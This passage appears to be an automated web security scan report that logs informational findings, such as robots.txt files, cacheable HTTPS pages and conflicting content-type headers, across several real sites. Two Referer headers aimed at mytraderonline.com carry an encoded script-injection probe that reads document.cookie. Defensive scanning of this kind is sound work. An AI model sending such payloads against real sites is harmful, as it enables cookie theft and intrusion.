Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.cloudaccess.net
Path:	/my-cloud-panel.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cloudaccess.net

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:54:53 GMT
Server: Apache/2.2.17 (CentOS)
Last-Modified: Sat, 05 Dec 2009 13:57:03 GMT
ETag: "1d9993d-130-479fb9953c9c0"
Accept-Ranges: bytes
Content-Length: 304
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

27.7. http://www.microsoft.com/web/media/badge/install_using_webpi_btn.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.microsoft.com
Path:	/web/media/badge/install_using_webpi_btn.png

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.microsoft.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=900
Content-Type: text/plain
Last-Modified: Tue, 21 Dec 2010 16:13:16 GMT
Accept-Ranges: bytes
ETag: "e213d5f929a1cb1:0"
Server: Microsoft-IIS/7.5
VTag: 438735341900000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 14:58:57 GMT
Connection: keep-alive
Content-Length: 12125

# Robots.txt file for http://www.microsoft.com
#

User-agent: *
Disallow: /*TOCLinksForCrawlers*
Disallow: /*/mac/help.mspx
Disallow: /*/mac/help.mspx?
Disallow: /*/mactopia/help.mspx?
Disallo
...[SNIP]...

27.8. http://www.x64bitdownload.com/templates/X64/css/rating.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/templates/X64/css/rating.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.x64bitdownload.com

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:58:56 GMT
Server: Apache/2.2.9 (Fedora)
Last-Modified: Wed, 14 Oct 2009 09:53:31 GMT
ETag: "14e046e-cd-475e222a2dcc0"
Accept-Ranges: bytes
Content-Length: 205
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Googlebot
Disallow: /rss/

User-agent: MSNBot
Disallow: /rss/

User-agent: Slurp
Disallow: /rss/

User-agent: *
Disallow: /write-review.html
Disallow: /saved-software.html
Disallow: /rd.ht
...[SNIP]...

27.9. http://www.youtube.com/subscribe_widget previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/subscribe_widget

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.youtube.com

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 14:58:58 GMT
Server: Apache
Last-Modified: Wed, 19 Jan 2011 17:18:00 GMT
ETag: "191-49a3632eac200"
Accept-Ranges: bytes
Content-Length: 401
Vary: Accept-Encoding
Content-Type: text/plain

# robots.txt file for YouTube

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /videos
Disallow: /bulletin
Disallow: /comment
Disallow: /forgot
Disallow: /login
Disallow: /results
...[SNIP]...

28. Cacheable HTTPS response previous next
There are 40 instances of this issue:

https://acc.newsguy.com/cgi-bin/login_frm
https://acc.newsguy.com/cgi-bin/ngexpress_form
https://acc.newsguy.com/cgi-bin/sub_form
https://acc.newsguy.com/cgi-bin/sub_spot_form
https://acc.newsguy.com/cgi-bin/sub_trial_form
https://acc.newsguy.com/cgi-bin/sub_unlmt_form
https://acc.newsguy.com/cgi-bin/usenetports
https://acc.newsguy.com/lotto_bonuspicks.htm
https://acc.newsguy.com/lotto_details.htm
https://acc.newsguy.com/requestid.htm
https://acc.newsguy.com/user/-/accnt_billing
https://acc.newsguy.com/user/-/accnt_contact
https://acc.newsguy.com/user/-/accnt_flash
https://acc.newsguy.com/user/-/accnt_history
https://acc.newsguy.com/user/-/customer_referrals
https://acc.newsguy.com/user/-/referrals_cashout
https://acc.newsguy.com/user/accnt_overview
https://acc.newsguy.com/user/accnt_renew
https://acc.newsguy.com/user/accnt_settings
https://acc.newsguy.com/user/accnt_signup_usenet
https://acc.newsguy.com/user/accnt_upgrade
https://bugzilla.mozilla.org/show_bug.cgi
https://cloudaccess.infusionsoft.com/AddForms/processFormSecure.jsp
https://github.com/DataSift/TweetMeme-Chrome-Extension
https://hostedusa3.whoson.com/chat/chatstart.htm
https://maps-api-ssl.google.com/maps
https://maps-api-ssl.google.com/maps/api/js
https://spreadsheets0.google.com/embeddedform
https://www.bmwusa.com/Secured/FrameCheck.aspx
https://www.cloudaccess.net/copyright-policy.html
https://www.cloudaccess.net/network-report.html
https://www.cloudaccess.net/network-sla.html
https://www.cloudaccess.net/privacy-policy.html
https://www.cloudaccess.net/support-sla.html
https://www.cloudaccess.net/terms-of-service.html
https://www.google.com/adsense/support/bin/request.py
https://www.mytraderonline.com/css/promoCSS.php
https://www.mytraderonline.com/css/tolhomecss.php
https://www.mytraderonline.com/javascript/master_s_code.js
https://www.mytraderonline.com/javascript/realmedia.js

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Cache-control: no-store
Pragma: no-cache

28.1. https://acc.newsguy.com/cgi-bin/login_frm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/cgi-bin/login_frm

Request

Response

28.2. https://acc.newsguy.com/cgi-bin/ngexpress_form previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/cgi-bin/ngexpress_form

Request

GET /cgi-bin/ngexpress_form HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:31 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Connection: close
Content-Type: text/html

<head>
<title>Newsguy - Open a Newsguy Express Account</title>
<meta NAME="description" CONTENT="Access to Usenet newsgroups, email accounts, web space,
software, archives, art & music galleries, fea
...[SNIP]...

28.3. https://acc.newsguy.com/cgi-bin/sub_form previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/cgi-bin/sub_form

Request

GET /cgi-bin/sub_form HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:31 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Connection: close
Content-Type: text/html

<head>
<title>Newsguy - Open a Newsgroup Account</title>
<meta NAME="description" CONTENT="Access to Usenet newsgroups, email accounts, web space,
software, archives, art & music galleries, feature c
...[SNIP]...

28.4. https://acc.newsguy.com/cgi-bin/sub_spot_form previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/cgi-bin/sub_spot_form

Request

GET /cgi-bin/sub_spot_form HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:32 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD><TITLE>Newsguy - Open a Spot Account</TITLE>
<style>
a {
text-decoration: none;
}

a:link, a:visited, a:active {
text-decor
...[SNIP]...

28.5. https://acc.newsguy.com/cgi-bin/sub_trial_form previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/cgi-bin/sub_trial_form

Request

GET /cgi-bin/sub_trial_form HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:33 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD><TITLE>Newsguy - Open a Free 14 Day Trial Account</TITLE>
<style>
a {
text-decoration: none;
}

a:link, a:visited, a:active
...[SNIP]...

28.6. https://acc.newsguy.com/cgi-bin/sub_unlmt_form previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/cgi-bin/sub_unlmt_form

Request

GET /cgi-bin/sub_unlmt_form HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:30 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Connection: close
Content-Type: text/html

<head>
<title>Newsguy - Open a Newsgroup Account</title>
<meta NAME="description" CONTENT="Access to Usenet newsgroups, email accounts, web space,
software, archives, art & music galleries, feature c
...[SNIP]...

28.7. https://acc.newsguy.com/cgi-bin/usenetports previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/cgi-bin/usenetports

Request

GET /cgi-bin/usenetports HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:28 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Connection: close
Content-Type: text/html

<html>
<head>
<title>Newsguy - Usenet Ports - Comprehensive Outsourcing Solutions - Signup</title>
<script language="JavaScript">
function calculate()
{
var justnumber = /^[1-9][0-9]*$/;
var justnu
...[SNIP]...

28.8. https://acc.newsguy.com/lotto_bonuspicks.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/lotto_bonuspicks.htm

Request

GET /lotto_bonuspicks.htm HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=BGcaQVM6SsMq0HMk6SquKem4opp0oWW0L4d3d923f;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 14:53:19 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Last-Modified: Thu, 07 Oct 2004 07:06:01 GMT
ETag: "20bdfd-3500-4164ead9"
Accept-Ranges: bytes
Content-Length: 13568
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>

<head>
<title>Newsguy - Newsguy Lotto! Weekly Winners!</title>
<meta NAME="description" CONTENT="Automatically read, post, decode and track newsg
...[SNIP]...

28.9. https://acc.newsguy.com/lotto_details.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/lotto_details.htm

Request

GET /lotto_details.htm HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=BGcaQVM6SsMq0HMk6SquKem4opp0oWW0L4d3d923f;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 14:53:18 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Last-Modified: Thu, 07 Oct 2004 07:06:01 GMT
ETag: "20be15-3646-4164ead9"
Accept-Ranges: bytes
Content-Length: 13894
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>

<head>
<title>Newsguy - Newsguy Lotto! Weekly Winners!</title>
<meta NAME="description" CONTENT="Automatically read, post, decode and track newsg
...[SNIP]...

28.10. https://acc.newsguy.com/requestid.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/requestid.htm

Request

GET /requestid.htm HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:46 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Last-Modified: Thu, 07 Oct 2004 07:06:01 GMT
ETag: "20be18-be9-4164ead9"
Accept-Ranges: bytes
Content-Length: 3049
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>

<head>
<title>Newsguy - Login / ID Lookup</title>
<meta NAME="description" CONTENT="ID Lookup for Newsguy, a leading provider of
newsgroup access
...[SNIP]...

28.11. https://acc.newsguy.com/user/-/accnt_billing previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/-/accnt_billing

Request

Response

28.12. https://acc.newsguy.com/user/-/accnt_contact previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/-/accnt_contact

Request

Response

28.13. https://acc.newsguy.com/user/-/accnt_flash previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/-/accnt_flash

Request

Response

28.14. https://acc.newsguy.com/user/-/accnt_history previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/-/accnt_history

Request

Response

28.15. https://acc.newsguy.com/user/-/customer_referrals previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/-/customer_referrals

Request

Response

28.16. https://acc.newsguy.com/user/-/referrals_cashout previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/-/referrals_cashout

Request

Response

28.17. https://acc.newsguy.com/user/accnt_overview previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/accnt_overview

Request

Response

28.18. https://acc.newsguy.com/user/accnt_renew previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/accnt_renew

Request

Response

28.19. https://acc.newsguy.com/user/accnt_settings previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/accnt_settings

Request

Response

28.20. https://acc.newsguy.com/user/accnt_signup_usenet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/accnt_signup_usenet

Request

Response

28.21. https://acc.newsguy.com/user/accnt_upgrade previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/accnt_upgrade

Request

Response

28.22. https://bugzilla.mozilla.org/show_bug.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://bugzilla.mozilla.org
Path:	/show_bug.cgi

Request

GET /show_bug.cgi HTTP/1.1
Host: bugzilla.mozilla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

28.23. https://cloudaccess.infusionsoft.com/AddForms/processFormSecure.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cloudaccess.infusionsoft.com
Path:	/AddForms/processFormSecure.jsp

Request

GET /AddForms/processFormSecure.jsp HTTP/1.1
Host: cloudaccess.infusionsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

28.24. https://github.com/DataSift/TweetMeme-Chrome-Extension previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://github.com
Path:	/DataSift/TweetMeme-Chrome-Extension

Request

GET /DataSift/TweetMeme-Chrome-Extension HTTP/1.1
Host: github.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

28.25. https://hostedusa3.whoson.com/chat/chatstart.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://hostedusa3.whoson.com
Path:	/chat/chatstart.htm

Request

GET /chat/chatstart.htm?domain=stalker.opticalcorp.com HTTP/1.1
Host: hostedusa3.whoson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Thu, 13 May 2010 08:48:10 GMT
Accept-Ranges: bytes
ETag: "041ab379f2ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 14:57:16 GMT
Connection: close
Content-Length: 1796

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="C
...[SNIP]...

28.26. https://maps-api-ssl.google.com/maps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://maps-api-ssl.google.com
Path:	/maps

Request

GET /maps HTTP/1.1
Host: maps-api-ssl.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

28.27. https://maps-api-ssl.google.com/maps/api/js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://maps-api-ssl.google.com
Path:	/maps/api/js

Request

GET /maps/api/js HTTP/1.1
Host: maps-api-ssl.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Vary: Accept-Language
Date: Mon, 24 Jan 2011 22:40:52 GMT
Server: mafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Connection: close

alert("The Google Maps API server rejected your request. The \x22sensor\x22 parameter specified in the request must be set to either \x22true\x22 or \x22false\x22.")

28.28. https://spreadsheets0.google.com/embeddedform previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://spreadsheets0.google.com
Path:	/embeddedform

Request

Response

28.29. https://www.bmwusa.com/Secured/FrameCheck.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.bmwusa.com
Path:	/Secured/FrameCheck.aspx

Request

Response

28.30. https://www.cloudaccess.net/copyright-policy.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.cloudaccess.net
Path:	/copyright-policy.html

Request

Response

28.31. https://www.cloudaccess.net/network-report.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.cloudaccess.net
Path:	/network-report.html

Request

Response

28.32. https://www.cloudaccess.net/network-sla.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.cloudaccess.net
Path:	/network-sla.html

Request

Response

28.33. https://www.cloudaccess.net/privacy-policy.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.cloudaccess.net
Path:	/privacy-policy.html

Request

Response

28.34. https://www.cloudaccess.net/support-sla.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.cloudaccess.net
Path:	/support-sla.html

Request

Response

28.35. https://www.cloudaccess.net/terms-of-service.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.cloudaccess.net
Path:	/terms-of-service.html

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:41 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:40 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Last-Modified: Fri, 02 Jul 2010 09:07:32 GMT
Expires: Mon, 24 Jan 2011 16:19:41 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 49990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<b
...[SNIP]...

28.36. https://www.google.com/adsense/support/bin/request.py previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.google.com
Path:	/adsense/support/bin/request.py

Request

Response

28.37. https://www.mytraderonline.com/css/promoCSS.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.mytraderonline.com
Path:	/css/promoCSS.php

Request

GET /css/promoCSS.php HTTP/1.1
Host: www.mytraderonline.com
Connection: keep-alive
Referer: https://www.mytraderonline.com/myt8ac25%3Cscript%3Ealert(document.cookie)%3C/script%3E9d5249ed1b2/sign-in/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1295921266915%7C1298513266915%3B%20s_lv%3D1295921266917%7C1390529266917%3B%20s_lv_s%3DFirst%2520Visit%7C1295923066917%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:07:55 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13 mod_ssl/2.0.63 OpenSSL/0.9.8l
X-Powered-By: PHP/5.2.13
Content-Length: 4589
Connection: close
Content-Type: text/html

/***********************
PROMOS
***********************/
.smlPromo3 {width: 249px; height: 293px;border: solid 1px #a2a2a2;background: url('/img/tol-designtol/gradient-179px-tile.jpg?') 0 0 repeat-
...[SNIP]...

28.38. https://www.mytraderonline.com/css/tolhomecss.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.mytraderonline.com
Path:	/css/tolhomecss.php

Request

GET /css/tolhomecss.php HTTP/1.1
Host: www.mytraderonline.com
Connection: keep-alive
Referer: https://www.mytraderonline.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1295921299027%7C1298513299027%3B%20s_lv%3D1295921299028%7C1390529299028%3B%20s_lv_s%3DFirst%2520Visit%7C1295923099028%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:29:26 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13 mod_ssl/2.0.63 OpenSSL/0.9.8l
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 8747

/******************
INDEX
*******************/
#idxTop{float:left;width:399px;margin-bottom:0;}
#idxBot{float:left;width:556px;border-left:2px #a2a2a2 solid;margin-bottom:0;}
#tileLftTp,#tileRtT
...[SNIP]...

28.39. https://www.mytraderonline.com/javascript/master_s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.mytraderonline.com
Path:	/javascript/master_s_code.js

Request

Response

28.40. https://www.mytraderonline.com/javascript/realmedia.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.mytraderonline.com
Path:	/javascript/realmedia.js

Request

GET /javascript/realmedia.js HTTP/1.1
Host: www.mytraderonline.com
Connection: keep-alive
Referer: https://www.mytraderonline.com/myt8ac25%3Cscript%3Ealert(document.cookie)%3C/script%3E9d5249ed1b2/sign-in/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:07:45 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13 mod_ssl/2.0.63 OpenSSL/0.9.8l
X-Powered-By: PHP/5.2.13
Content-Length: 2571
Connection: close
Content-Type: text/html

   // Instantiate the real media variables
   var oas='https://oasc05.247realmedia.com/RealMedia/ads/';
   var RN = new String (Math.random());
   var RNS = RN.substring (2,11);
   var _version = 40;

   // Fun
...[SNIP]...

29. Multiple content types specified previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.doclix.com
Path:	/

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Content-Type: text/plain; charset=UTF-8
text/html; charset=UTF-8

Issue background

If a web response specifies multiple incompatible content types, then the browser will usually analyse the response and attempt to determine the actual MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of multiple incompatible content type statements does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET / HTTP/1.1
Host: ads.doclix.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
